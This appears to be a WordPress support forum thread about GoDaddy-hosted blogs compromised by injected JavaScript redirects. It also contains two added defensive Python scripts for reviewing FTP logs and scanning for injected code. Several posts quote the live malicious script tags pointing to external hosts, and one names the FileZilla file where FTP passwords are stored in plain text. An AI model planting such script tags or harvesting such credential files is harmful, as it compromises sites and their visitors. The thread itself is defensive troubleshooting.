Godaddy wordpress blog hacked (30 posts)

  1. arthur_22
    Member
    Posted 4 years ago #

    My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:

    <script src="http://cechirecom.com/js.php"></script>

    I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I'll probably do a clean install later.

    But what worries me is that I am careful about blog security. I always update to the latest WordPress install as soon as it comes out, I always check plugins and only use the bare minimum, I have very strong passwords...

    So...does anyone know if it could be Godaddy servers that have the problem? Or do I need to go through every WordPress hardening tip out there just to avoid this kind of thing?

  2. wpsecuritylock
    Member
    Posted 4 years ago #

    Hello Arthur,

    Same thing here. I just restored a website for a client 2 days ago and this morning it got this new malware. It has the same beginning injected code, but the script in the footer was different.

    We just restored it to yesterday's date to see if that takes care of it.

    Check my blog post to see some things you can try.

    http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/

    Let me know if you need any help.

    Securely yours,

    Regina Smola

  3. Go Daddy
    Go Daddy Support
    Posted 4 years ago #

    A few of our customers were affected. Here's what our CISO had to say about it:

    "WordPress is a-ok. Go Daddy is rock solid. Neither were 'hacked,' as some have speculated.

    After an extensive investigation, we can report there was a small group of customers negatively impacted. What happened? Those users had outdated versions of the popular blogging software, set up in a particular way.

    This underscores the importance of installing the latest Web applications, no matter where you are on the Internet. If you use Hosting Connection, automatically update WordPress to version 2.9.2 using the simple 3-step update offered when you log-in.

    And, while we're on the topic of Web security and Best Practices - be sure all your online passwords are unique, secure, and in a safe place."

    If you have questions or you'd like someone to take a look at your WordPress site, please get in touch with our 24/7 support team at http://fwd4.me/MBI

    Alicia

  4. redkathy
    Member
    Posted 4 years ago #

    I was hacked on April 21 and now April 30. Go Daddy offered NO HELP. Said I would have to pay 150.00 to have them restore my hosting. Claimed it was not their fault. It would be most helpful if Go Daddy offered some assistance rather than denying they had any responsibility in the matter.

  5. Go Daddy
    Go Daddy Support
    Posted 4 years ago #

    redkathy,

    We've posted instructions for fixing the issue at http://fwd4.me/MFK. Please make sure that you follow all of the steps, including the 'permanent fix'.

    Salem

  6. Chris Reynolds
    Member
    Posted 4 years ago #

    um...I can say, in total honesty, without hesitation, that the two blogs hosted on GoDaddy that I support were both running 2.9.2. I'm interested in what the "particular way" the compromised blogs were set up in...

  7. Hulbert Lee
    Member
    Posted 4 years ago #

    Hi, my blog was also hacked I think. I cannot submit replies to comments like I used to, WordPress runs slower than normal, and the Dashboard looks different when I open it up on Firefox. What do I need to do to restore it back to normal?

  8. Chris Reynolds
    Member
    Posted 4 years ago #

    @Hulbert: if you're on a Linux server, you can restore an earlier version of your files: http://help.godaddy.com/article/5091
    GoDaddy has recommended backing up your database and any uploaded files, deleting your full WP installation, and reinstalling to the most recent version, but I don't see how that is any better than restoring the files (unless there was a stray php file that was infected in the earlier version with potential to infect others). That method would be more complete, however, and may be an option if you're on a Windows server and don't have the option to restore from a previous backup (I've only tried the restore on a Linux server, so I don't know if it's possible or not on Windows, but the help doc only refers to this being possible on Linux).
    http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it/

  9. Hulbert Lee
    Member
    Posted 4 years ago #

    @jazzs3quence Thank you for your help. This is an email I got today.

    Hulbert,

    Thanks for your message. We did a scan of your website, and showed malicious malware scripts on your site:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    XML-RPC server accepts POST requests only.<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Can I still use your method to solve this issue?

  10. WeWatch
    Member
    Posted 4 years ago #

    Sorry to be so late jumping in here, but here goes.

    Many of these and other website infections are the result of stolen FTP or other login passwords.

    These are typically stolen by a virus on a PC that has FTP access to the infected website. Especially when the website has been re-infected a few times.

    I know everyone has anti-virus software installed, however, with so many variants of viruses the anti-virus (AV) companies have a difficult time keeping up. All it takes is one minute that your AV software isn't up-to-date and you can be infected (well, your PC).

    From there the virus learns how to evade detection of the AV software. If you're using one of the free FTP programs, like FileZilla and you store your passwords in the software so you don't have to login each time you want to transfer files, the login credentials are stored in a plain text file.

    For FileZilla, you can see the file here:

    C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml (user could be Administrator if you're logging into your PC as Administrator)

    All the information a virus needs is stored right there in plain text. It steals this information and sends it to a server which then logs in to the website, downloads files, injects the malscript and then uploads them back to the website. If you have your FTP logs activated, you can see where the infected files came from.

    The virus also works by "sniffing" the FTP traffic. Since FTP transmits all data, including username and password in plain text, it's easy for the virus to see and steal the information this way as well. I have a YouTube video showing this here: http://www.youtube.com/watch?v=oYI1kssrrbc

    Like I said the virus learns how to evade detection of the currently installed anti-virus software so you may need to use something different. Many have had good success with one of the following: Kaspersky, Avast or Vipre. If you're already using one of these, then try one of the other two - it has to be different.

    So, first change all FTP passwords. I generally recommend setting up a separate username and password for each user and make sure FTP logging is activated. That way if you do get infected, you can look in the logs and know for certain who was the cause.

    Second, install a new AV and scan all PCs.

    Third, remove the malscripts. If you have your website downloaded to your PC, you can use a program like grepWin (it's free) to find and remove the malscript.

    Fourth, if Google has blacklisted you, you'll have to request a review from the Google Webmaster tools.

    We clean websites for a living so I do know what I'm talking about here.
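WeWatch's point about FTP logs, as an added example that is not part of the post: the sketch below looks for the download, modify, re-upload pattern described above. It assumes the host writes transfer logs in the common xferlog format; the log lines, addresses, user name and function names are constructed for illustration.

```python
from datetime import datetime

# Constructed sample in xferlog format (hosts, user and paths are made up).
# Field 12 is the direction: "o" = download from the site, "i" = upload to it.
SAMPLE_LOG = """\
Thu May  6 03:12:41 2010 1 203.0.113.7 5120 /html/wp-content/themes/x/footer.php a _ o r blogftp ftp 0 * c
Thu May  6 03:12:44 2010 1 203.0.113.7 5188 /html/wp-content/themes/x/footer.php a _ i r blogftp ftp 0 * c
Thu May  6 09:30:02 2010 2 198.51.100.20 20480 /html/wp-content/uploads/photo.jpg b _ i r blogftp ftp 0 * c
Thu May  6 09:41:10 2010 1 198.51.100.20 5120 /html/index.php a _ i r blogftp ftp 0 * c
"""

WEB_EXTS = (".php", ".html", ".htm", ".js")

def parse_xferlog(text):
    """Yield one dict per well-formed xferlog line; skip anything else."""
    for line in text.splitlines():
        t = line.split()
        if len(t) < 18 or not t[7].isdigit():
            continue
        yield {
            "when": datetime.strptime(" ".join(t[:5]), "%a %b %d %H:%M:%S %Y"),
            "host": t[6], "size": int(t[7]), "path": t[8],
            "direction": t[11], "user": t[13], "status": t[17],
        }

def find_roundtrips(text, window_s=600):
    """Return uploads of a web file that follow a download of the same file
    by the same host and account within window_s seconds."""
    last_download, hits = {}, []
    for e in parse_xferlog(text):
        # Only completed transfers ("c") of files a browser or PHP will execute.
        if e["status"] != "c" or not e["path"].lower().endswith(WEB_EXTS):
            continue
        key = (e["host"], e["user"], e["path"])
        if e["direction"] == "o":
            last_download[key] = e
        elif e["direction"] == "i" and key in last_download:
            d = last_download.pop(key)
            if (e["when"] - d["when"]).total_seconds() <= window_s:
                hits.append({"host": e["host"], "user": e["user"],
                             "path": e["path"], "uploaded_at": e["when"],
                             "grew_by": e["size"] - d["size"]})
    return hits

if __name__ == "__main__":
    for h in find_roundtrips(SAMPLE_LOG):
        print(f'{h["uploaded_at"]} {h["host"]} as {h["user"]}: '
              f'{h["path"]} re-uploaded, {h["grew_by"]:+d} bytes')
```

A hit names the account whose password needs changing and the address the upload came from, which is the reason for giving each user a separate FTP login.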

  11. Frumph
    Member
    Posted 4 years ago #

    Just so GD hosting knows this.

    I have personally helped fix over 23 Godaddy Hosted WordPress Hacked sites in the last 2 weeks.

    "WordPress is a-ok. Go Daddy is rock solid. Neither were 'hacked,' as some have speculated."

    That quote is a little BS to me at this time.

    When users are FTP'ing up their wordpress installation they more than likely do not know anything about permissions and did not set anything specific for their hosting.

    I am more prone to think that GoDaddy has a user account directory fail where the scripts can search directory structures to modify PHP files.

    Why do I believe this? Because on one of the GoDaddy accounts for the calamitiesofnature.com site they do *not* use wordpress and had the same hack in their PHP files.

    - Phil

  12. Steve D
    Member
    Posted 4 years ago #

    It's a jungle out there.

  13. blogadmonkey
    Member
    Posted 4 years ago #

    Hello I have just cleared the blog of the malscripts and done the steps recommended by WeWatch.

    My wp admin dashboard is still mismatched, how can I solve this?

  14. derekbanas
    Member
    Posted 4 years ago #

    I posted a ton of solutions specific to a hacked WordPress account on Go Daddy. Don't pay the $150. All they do is go into your File Manager, click on History and then the restore button. This will not work. You have to reinstall themes, sometimes plugins. It's all in the article. Hope that helps if not just ask. Fix WordPress after Hack

  15. helpme11
    Member
    Posted 4 years ago #

    hi, i received an email

    WordPress Security Issue - Please Upgrade As Soon As Possible

    i already have the new version of wordpress

    I called godaddy and they said to call wordpress. (no listing for wordpress)

    anyways!!

    and my dashboard is messed up so i clicked on the 4 column and refreshed the page and it corrected the dashboard on the main dashboard but the

    post dashboard
    and so is the comment dashboard

    is messed up still.

    how can i get my dashboard to the normal way so i can continue with my blog.!!

    please. helpme111

  16. helpme11
    Member
    Posted 4 years ago #

    if you respond to this post please don't redirect me to a link where i can get help. that's not cool

    just type the steps here in this forum

    1
    2
    3
    4
    5
    6

    ( i just want to say whoever is responsible for this hack or virus - you could do well with your skills and help improve people lives and not make life frustrating for people. maybe you should look in the mirror and tell yourself you are a good person and do good things with your skills..... ) try it!

  17. helpme11
    Member
    Posted 4 years ago #

    this is the email i received - i took out the phone number because i have no clue if this is a fake or real.. and i don't want to guide someone into a further trap of hell!!

    We are sending you this message because you may not be using the current version of WordPress.

    Many outdated versions of WordPress have been affected by malware. For the security of your site, it is important that you install the latest version of WordPress as soon as possible.

    While it's convenient, the quick upgrade feature in WordPress and in Hosting Connections does not remove old files. We recommend a more thorough backup and upgrade.

    Please follow these detailed instructions to upgrade your version of WordPress and protect your site.

    We appreciate your attention on this critical issue. We are here to help if you have difficulty with the update/upgrade installations. While this "exploitation" is not unique to WordPress or Chadle, it has impacted some of our shared hosting customers and we are making every effort to "spread the word about the fix." Our goal is to help you keep your website safe and secure. If you have questions, please call us 24/7 at .

    Sincerely,

    Hosting Security Team

  18. Go Daddy
    Go Daddy Support
    Posted 4 years ago #

    @helpme11
    GoDaddy.com did send out a notification to customers affected by this issue. Although I know you would prefer not to be linked, I want to avoid flooding the forum. For a step-by-step guide to update WordPress, please visit http://fwd4.me/NGN

    Alicia

  19. helpme11
    Member
    Posted 4 years ago #

    can someone from wordpress please respond to how can i fix my dashboard so i can continue with my blog posting..

    my post dashboard and
    comment dashboard is messed up

  20. esmi
    Forum Moderator
    Posted 4 years ago #

    @helpme11: Could you please stick to the one topic!

    http://wordpress.org/support/topic/396524/page/2?replies=37

  21. Chris Reynolds
    Member
    Posted 4 years ago #

    @Hulbert (& everyone else in the same boat)--

    that looks like the same infection, so if you haven't done so already, restoring to a backup from before you were hit would still work. then make sure you've got the right permissions and everything else set up (for what it's worth, though it doesn't seem to be doing much in terms of prevention for some people).

    this post on sucuri.net has a script you can run that might make things a little easier (especially if you keep getting hit by the same thing): http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

    http://wpsecuritylock.com has been posting pretty regular updates on all the attacks with complete steps for recovering your site as well.

  22. Chris Reynolds
    Member
    Posted 4 years ago #

    @derekbanas -- looks like your site was hit by the latest wave http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/

  23. helpme11
    Member
    Posted 4 years ago #

    NOTE: If you suspect your WordPress site has been affected by a security issue, we recommend upgrading your WordPress installation.

    i already had an upgraded version.

    so should i do it again? and upgrade.

    well i did. i upgraded

    and i still have a messed up dashboard.

    what can i do? please

  24. helpme11
    Member
    Posted 4 years ago #

    i just had a thought. why would someone want to hack our websites. so pointless. what do they gain from it?

    i'm still waiting for a reply. i wish i was getting a notification every time there is a reply so i don't have to keep refreshing the page to see if someone replied.

    omg

  25. ClaytonJames
    Member
    Posted 4 years ago #

    Upgrading after you have been hacked does nothing. It's putting a band-aid on a gangrenous leg.

    Sanitize your site and your database first.

    Second, close the holes that have nothing to do with wordpress, such as:
    1) Crappy passwords and sloppy habits
    2) Incorrect file permissions and ownership
    3) Infected and neglected PC's on your home network used to upload files to your web space
    4) Neglecting or ignoring security updates and a lack of regard for learning the basics about caring for a web space
    5) Stop storing FTP and other login credentials in every desktop application that will store them.

    "why would someone want to hack our websites. so pointless. what do they gain from it?"

    Not pointless at all. "They" want to control your web space for their own use because it's weak and exploitable for some reason. "They" don't care who you are, and "They" are usually robots and scripts. The human factor is a very distant endpoint in most cases.

    You can start by following and reading the information in the links you find listed here:

    http://wordpress.org/support/topic/396449?replies=8#post-1506407

    You can also post a link to one of your hacked sites, and someone (if they dare visit your site) might be able to provide you more info on the "how", or "why" aspect of the problem.

  26. helpme11
    Member
    Posted 4 years ago #

    This is what my friend wrote to me:

    look at wp-content/themes/sem-reloaded/ (anything with that datestamp
    me: where do i go to see that ..
    friend: You'll see base 64 code at the top of each script. It's all been hacked.
    ftp
    It's not part of WP.
    use an FTP client to get to your server
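The check that WeWatch's third step and the chat above describe, as an added example that is not part of any post in this thread: scan a downloaded copy of the site for the footer `<script>` injection and for base64 code at the top of PHP files. The `eval(base64_decode(` shape is an assumption (the thread never shows the injected PHP), and `blog.example`, the sample files and the function names are constructed.

```python
import os
import re

# External <script src="http://host/..."> tags, like the one quoted in the first post.
SCRIPT_TAG = re.compile(r'<script[^>]+src=["\'](https?://([^/"\']+)[^"\']*)["\']', re.I)
# Assumed shape of the "base 64 code at the top of each script": the file opens
# with <?php followed directly by eval(base64_decode(...)).
B64_HEAD = re.compile(r'\s*<\?php\s*(/\*.*?\*/\s*)?eval\s*\(\s*base64_decode\s*\(',
                      re.I | re.S)

# Constructed samples; "Li4u" is a harmless placeholder payload.
CLEAN_FOOTER = ('<?php wp_footer(); ?>\n'
                '<script src="http://blog.example/wp-includes/js/jquery.js"></script>\n')
INFECTED_FOOTER = ('<?php /**/ eval(base64_decode("Li4u")); ?>\n'
                   '<?php wp_footer(); ?>\n'
                   '<script src="http://cechirecom.com/js.php"></script>\n')

def inspect_text(text, allowed_hosts=()):
    """Return a list of (kind, detail) findings for one file's contents."""
    findings = []
    if B64_HEAD.match(text):
        findings.append(("base64-eval-header", text.lstrip().splitlines()[0][:60]))
    for m in SCRIPT_TAG.finditer(text):
        # Anything not served from the site itself or a host you chose to trust.
        if m.group(2).lower() not in allowed_hosts:
            findings.append(("external-script", m.group(1)))
    return findings

def scan_tree(root, allowed_hosts=(), exts=(".php", ".html", ".htm", ".js")):
    """Walk a local copy of the site and map relative path -> findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = inspect_text(fh.read(), allowed_hosts)
            if found:
                report[os.path.relpath(path, root)] = found
    return report

if __name__ == "__main__":
    for kind, detail in inspect_text(INFECTED_FOOTER, {"blog.example"}):
        print(kind, detail)
```

Run `scan_tree` against the downloaded copy before and after cleaning; a file that still reports a finding was missed, and a theme or plugin directory full of hits is quicker to reinstall than to edit by hand.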

  27. ClaytonJames
    Member
    Posted 4 years ago #

    Go here, read this, try the fix. Help others by reporting back with the results.

    http://wordpress.org/support/topic/396524/page/2?replies=47#post-1506618

  28. AITpro
    Member
    Posted 4 years ago #

    Hmm. Your web host is responsible only up to a certain degree for providing security for your website and then the actual owner is then responsible for his or her own personal website security. I see someone mentioned checking file and folder permissions to make sure they are set correctly. And I see someone else mentioned protecting and securing documents that contain passwords and account info. I also see several other very good procedures and practices that everyone should follow to ensure their own personal website security.

    This is going to seem like self promotion and I guess it is a little bit, but believe it or not I actually really genuinely care and like offering help whenever possible. So anyway I had a client that was hacked on GD a couple of months ago because they had custom coding (it was dirty code) that was being exploited by an XSS script attack. The client had an HTML site and a WordPress website that was being hacked. I came across some .htaccess code that filters and blocks XSS and SQL injection hacking attacks. I then went on to make a simple WordPress plugin to automate handling the .htaccess files simple and easy and added a maintenance mode for my own personal use as a website developer. WordPress is very secure already, but if you leave any doors open, trust me a hacker will be camping in your website living room before you have a chance to blink. I'm going to say it again WordPress is already very secure, but if you want an extra level of protection against XSS or SQL injection hacks then check out the BulletProof Security plugin. It's very simple and very effective. I have tested it in the most hacker infested waters with open website wounds clearly exposed for hackers to see and so far so good. Zero XSS or SQL injection hacked websites that are now using BulletProof Security. Yeah I'm plugging my own plugin LOL. I'm offering some help so take it or leave it. There is nothing that sucks more than having to clean up a website that has been hacked. Ugh.

    Whether or not you use the plugin, one thing that should be standard for any website is an .htaccess file that actually provides security for your website.

  29. anomalousmaterial
    Member
    Posted 4 years ago #

    My blog has been infected 4 times in as many weeks. I run a php script to clean every file on my end and then reinstall wordpress, my theme and all plugins. I change my WordPress key, passwords, FTP password, MySQL password. And it still keeps coming back! And yes, I have GoDaddy! Those people lost a customer.

This topic has been closed to new replies.